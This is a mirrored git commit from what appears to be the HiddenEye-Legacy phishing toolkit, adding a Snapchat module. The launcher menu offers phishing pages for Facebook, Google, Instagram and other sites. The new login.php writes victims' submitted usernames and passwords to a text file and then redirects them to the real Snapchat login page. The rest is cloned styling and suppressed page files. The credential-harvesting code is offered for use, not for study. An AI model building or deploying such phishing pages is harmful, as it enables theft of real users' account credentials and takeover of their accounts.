mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Merge pull request #6 from usama7628674/master
Snapchat_added , NICE ONE
This commit is contained in:
commit
a11aa3e33e
31
Server/www/Scripts/main.en-us.js
Normal file
31
Server/www/Scripts/main.en-us.js
Normal file
File diff suppressed because one or more lines are too long
BIN
Server/www/styles/fonts/icons.eot
Normal file
BIN
Server/www/styles/fonts/icons.eot
Normal file
Binary file not shown.
BIN
Server/www/styles/fonts/icons.woff
Normal file
BIN
Server/www/styles/fonts/icons.woff
Normal file
Binary file not shown.
BIN
Server/www/styles/fonts/icons.woff2
Normal file
BIN
Server/www/styles/fonts/icons.woff2
Normal file
Binary file not shown.
11
Server/www/styles/semantic.min.css
vendored
Normal file
11
Server/www/styles/semantic.min.css
vendored
Normal file
File diff suppressed because one or more lines are too long
69
Server/www/styles/snapchat.css
Normal file
69
Server/www/styles/snapchat.css
Normal file
|
@ -0,0 +1,69 @@
|
|||
.snapchatFontThin {
|
||||
font-family: 'HelveticaNeue-Thin', 'HelveticaNeue-Light', 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif;
|
||||
}
|
||||
|
||||
a {
|
||||
cursor: pointer;
|
||||
}
|
||||
|
||||
#navigationMenu {
|
||||
text-align: center;
|
||||
padding: 1rem;
|
||||
}
|
||||
#navigationMenu .button {
|
||||
width: 75%;
|
||||
max-width: 240px;
|
||||
}
|
||||
|
||||
#navigationMenuButton {
|
||||
float: right;
|
||||
}
|
||||
#navigationMenuButton img {
|
||||
width: 20px;
|
||||
}
|
||||
|
||||
.ui.snapchatHeader.stackable.grid .column {
|
||||
margin-top: 2rem !important;
|
||||
margin-bottom: 1rem;
|
||||
padding-top: 1rem !important;
|
||||
padding-bottom: 1rem;
|
||||
}
|
||||
.snapchatHeader .logo {
|
||||
width: 80px;
|
||||
}
|
||||
|
||||
.snapchatInvertedHeader h1 {
|
||||
text-align: center;
|
||||
}
|
||||
.snapchatInvertedHeader h1 .logo {
|
||||
padding-top: .5rem;
|
||||
width: 36px;
|
||||
}
|
||||
|
||||
|
||||
.snapchatBody.stackable.grid {
|
||||
padding-bottom: 5rem !important;
|
||||
}
|
||||
|
||||
.snapchatFooter.stackable.grid {
|
||||
padding-top: 3rem;
|
||||
padding-bottom: 4rem;
|
||||
border-top: 1px solid #EEE;
|
||||
}
|
||||
|
||||
.snapchatFooter.stackable.grid h5 {
|
||||
text-transform: uppercase;
|
||||
}
|
||||
|
||||
.snapchatFooter .column {
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
@font-face {
|
||||
font-family: 'Dropdown';
|
||||
src: url("fonts/icons.woff");
|
||||
format('truetype'), url("fonts/icons.woff");
|
||||
format('woff');
|
||||
font-weight: normal;
|
||||
font-style: normal;
|
||||
}
|
|
@ -95,6 +95,8 @@ def runPhishing(social, option2):
|
|||
system('cp WebPages/wordpress/*.* Server/www/')
|
||||
elif social == 'Twitter':
|
||||
system('cp WebPages/twitter/*.* Server/www/')
|
||||
elif social == 'Snapchat':
|
||||
system('cp WebPages/Snapchat_web/*.* Server/www/')
|
||||
elif option2 == '1' and social == 'Instagram':
|
||||
system('cp WebPages/Instagram_web/*.* Server/www/')
|
||||
elif option2 == '2' and social == 'Instagram':
|
||||
|
@ -161,7 +163,7 @@ def runPEnv():
|
|||
system('clear')
|
||||
print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END)
|
||||
exit(0)
|
||||
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
if option == '1':
|
||||
loadModule('Facebook')
|
||||
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Mobile Version(mobile_mode)\n\n {0}[{1}4{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}5{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
|
@ -193,7 +195,11 @@ def runPEnv():
|
|||
elif option == '8':
|
||||
loadModule('Instagram')
|
||||
option2 =raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
runPhishing('Instagram', option2)
|
||||
runPhishing('Instagram', option2)
|
||||
elif option == '9':
|
||||
loadModule('Snapchat')
|
||||
option2 = ''
|
||||
runPhishing('Snapchat', option2)
|
||||
else:
|
||||
exit(0)
|
||||
|
||||
|
|
31
WebPages/Snapchat_web/Scripts/main.en-us.js
Normal file
31
WebPages/Snapchat_web/Scripts/main.en-us.js
Normal file
File diff suppressed because one or more lines are too long
265
WebPages/Snapchat_web/index.html
Normal file
265
WebPages/Snapchat_web/index.html
Normal file
File diff suppressed because one or more lines are too long
14
WebPages/Snapchat_web/login.php
Normal file
14
WebPages/Snapchat_web/login.php
Normal file
|
@ -0,0 +1,14 @@
|
|||
<?php
|
||||
$var = $_POST['username'];
|
||||
$var2 = $_POST['password'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://accounts.snapchat.com');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
}
|
||||
exit();
|
||||
?>
|
BIN
WebPages/Snapchat_web/styles/fonts/icons.eot
Normal file
BIN
WebPages/Snapchat_web/styles/fonts/icons.eot
Normal file
Binary file not shown.
BIN
WebPages/Snapchat_web/styles/fonts/icons.woff
Normal file
BIN
WebPages/Snapchat_web/styles/fonts/icons.woff
Normal file
Binary file not shown.
BIN
WebPages/Snapchat_web/styles/fonts/icons.woff2
Normal file
BIN
WebPages/Snapchat_web/styles/fonts/icons.woff2
Normal file
Binary file not shown.
11
WebPages/Snapchat_web/styles/semantic.min.css
vendored
Normal file
11
WebPages/Snapchat_web/styles/semantic.min.css
vendored
Normal file
File diff suppressed because one or more lines are too long
69
WebPages/Snapchat_web/styles/snapchat.css
Normal file
69
WebPages/Snapchat_web/styles/snapchat.css
Normal file
|
@ -0,0 +1,69 @@
|
|||
.snapchatFontThin {
|
||||
font-family: 'HelveticaNeue-Thin', 'HelveticaNeue-Light', 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif;
|
||||
}
|
||||
|
||||
a {
|
||||
cursor: pointer;
|
||||
}
|
||||
|
||||
#navigationMenu {
|
||||
text-align: center;
|
||||
padding: 1rem;
|
||||
}
|
||||
#navigationMenu .button {
|
||||
width: 75%;
|
||||
max-width: 240px;
|
||||
}
|
||||
|
||||
#navigationMenuButton {
|
||||
float: right;
|
||||
}
|
||||
#navigationMenuButton img {
|
||||
width: 20px;
|
||||
}
|
||||
|
||||
.ui.snapchatHeader.stackable.grid .column {
|
||||
margin-top: 2rem !important;
|
||||
margin-bottom: 1rem;
|
||||
padding-top: 1rem !important;
|
||||
padding-bottom: 1rem;
|
||||
}
|
||||
.snapchatHeader .logo {
|
||||
width: 80px;
|
||||
}
|
||||
|
||||
.snapchatInvertedHeader h1 {
|
||||
text-align: center;
|
||||
}
|
||||
.snapchatInvertedHeader h1 .logo {
|
||||
padding-top: .5rem;
|
||||
width: 36px;
|
||||
}
|
||||
|
||||
|
||||
.snapchatBody.stackable.grid {
|
||||
padding-bottom: 5rem !important;
|
||||
}
|
||||
|
||||
.snapchatFooter.stackable.grid {
|
||||
padding-top: 3rem;
|
||||
padding-bottom: 4rem;
|
||||
border-top: 1px solid #EEE;
|
||||
}
|
||||
|
||||
.snapchatFooter.stackable.grid h5 {
|
||||
text-transform: uppercase;
|
||||
}
|
||||
|
||||
.snapchatFooter .column {
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
@font-face {
|
||||
font-family: 'Dropdown';
|
||||
src: url("fonts/icons.woff");
|
||||
format('truetype'), url("fonts/icons.woff");
|
||||
format('woff');
|
||||
font-weight: normal;
|
||||
font-style: normal;
|
||||
}
|
Loading…
Reference in New Issue
Block a user